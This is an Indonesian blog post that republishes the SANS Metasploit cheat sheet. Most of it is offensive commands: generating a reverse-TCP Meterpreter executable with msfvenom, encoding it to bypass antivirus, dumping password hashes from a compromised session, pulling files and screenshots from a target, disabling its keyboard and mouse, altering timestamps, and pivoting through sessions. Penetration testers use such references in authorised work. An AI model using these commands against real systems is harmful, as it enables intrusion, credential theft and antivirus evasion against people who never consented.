Metasploit Cheat Sheet Free Download - GNU/Linux


Assalamualaikum Wr.Wb..
dengan diberikan nikmat dan rezeki dari Allah SWT, saya Mr.GagalTotal666 akan
share sedikit modul Metasploit di Linux/GNU Linux.

sudah lama saya tidak mempost atau membuat artikel di karenakan
kebanyakan sibuk di dunia nyata, oke kali ini saya akan sedikit
membagikan Metasploit Cheat Sheet cocok bagi anda
yang suka bermain metasploit

kalau anda masih kurang mengerti apa itu metasploit ?
anda bisa membaca nya [disini]

repot jika saya menjelaskan arti metaspsloit,
langsung saja ini dia isi dari Metasploit Cheat Sheet


Metasploit Cheat Sheet di buat oleh Yori Kvitchko, Tom Hessman,
Daniel Pendolino, & Ed Skoudis from Sans.org

Meterpreter Post Modules
Dengan sesi Meterpreter yang tersedia, modul pos dapat dijalankan di mesin target

Post Modules from Meterpreter
meterpreter > run post/multi/gather/env

Post Modules on a Backgrounded Session
msf > use post/windows/gather/hashdump
msf > show options
msf > set SESSION 1
msf > run

Useful Auxiliary Modules

Port Scanner
msf > use auxiliary/scanner/portscan/

tcp
msf > set RHOSTS 10.10.10.0/24
msf > run

DNS Enumeration
msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run

FTP Server
msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

Proxy Server
msf > use auxiliary/server/socks4
msf > run

Msfvenom

Run with
‘’-l payloads’ to get a list of payloads.

$ msfvenom –p [PayloadPath]
–f [FormatType]
LHOST=[LocalHost (if reverse conn.)]
LPORT=[LocalPort]

Contoh :

Reverse Meterpreter payload as an executable and
redirected into a file :
$ msfvenom -p windows/meterpreter/
reverse_tcp -f exe LHOST=10.1.1.1
LPORT=4444 > met.exe

Format Options (specified with –f)

–help-formats – List available output formats
exe – Executable
pl – Perl
rb – Ruby
raw – Raw shellcode
c – C code

Encoding Payloads with msfvenom
The msfvenom tool can be used to apply a level of encoding
for anti-virus bypass. Run with ‘-l encoders‘ to get a list of encoders.

$ msfvenom -p [Payload] -e [Encoder] -f
 [FormatType] -i [EncodeInterations]
 LHOST=[LocalHost (if reverse conn.)]
 LPORT=[LocalPort]

contoh :

Encode a payload from msfpayload 5 times using shikataga-nai
encoder and output as executable :

$ msfvenom -p windows/meterpreter/
reverse_tcp -i 5 -e x86/shikata_ga_nai -f
exe LHOST=10.1.1.1 LPORT=4444 > mal.exe

Metasploit Console Basics (msfconsole)
Search for module :
msf > search [regex]

Specify and exploit to use :
msf > use exploit/[ExploitPath]

Specify a Payload to use :
msf > set PAYLOAD [PayloadPath]

Show options for the current modules:
msf > show options

Set options :
msf > set [Option] [Value]

Start exploit :
msf > exploit

Metasploit Meterpreter
Base Commands :
? / help : Display a summary of commands
exit / quit : Exit the Meterpreter session
sysinfo : Show the system name and OS type
shutdown / reboot : Self-explanatory

File System Commands :
cd: Change directory
lcd: Change directory on local (attacker’s) machine
pwd / getwd: Display current working directory
ls: Show the contents of the directory
cat: Display the contents of a file on screen
download / upload: Move files to/from the target machine
mkdir / rmdir: Make / remove directory
edit: Open a file in the default editor (typically vi)

Metasploit Meterpreter (contd)
Process Commands :
getpid: Display the process ID that Meterpreter is running inside
getuid: Display the user ID that Meterpreter is running with
ps: Display process list
kill: Terminate a process given its process ID
execute: Run a given program with the privileges
of the process the Meterpreter is loaded in
migrate: Jump to a given destination process ID
– Target process must have same or lesser privileges
– Target process may be a more stable process
– When inside a process, can access any files that
process has a lock on

Network Commands :
ipconfig : Show network interface information
portfwd : Forward packets through TCP session
route : Manage/view the system’s routing table

Misc Commands :
idletime : Display the duration that the GUI of the target machine has been idle
uictl [enable/disable] [keyboard/mouse] : Enable/disable either the mouse or keyboard
of the target machine
screenshot : Save as an image a screenshot of the target machine

Additional Modules :
use [module] : Load the specified module

Example :
use priv : Load the priv module
hashdump : Dump the hashes from the box
timestomp:Alter NTFS file timestamps

Managing Sessions
Multiple Exploitation :
Run the exploit expecting a single session that is immediately backgrounded:
msf > exploit -z


Run the exploit in the background expecting one or more sessions that are
immediately backgrounded :
msf > exploit –j

List all current jobs (usually exploit listeners) :
msf > jobs –l

Kill a job :
msf > jobs –k [JobID]

Multiple Sessions :
List all backgrounded sessions: msf > sessions -l
Interact with a backgrounded session:msf > session -i [SessionID]
Background the current interactive session :
meterpreter > <Ctrl+Z> or meterpreter > background

Routing Through Sessions :
All modules (exploits/post/aux) against the target subnet mask
will be pivoted through this session.

msf > route add [Subnet to Route To]
 [Subnet Netmask] [SessionID]

jika anda berminat silakan anda download link di bawah ini

Metasploit Cheat Sheet

Semoga Bermanfaat ^_^ ...

Wasalamualaikum Wr.Wb..

Sumber : [https://latesthackingnews.com]

Post a Comment

0 Comments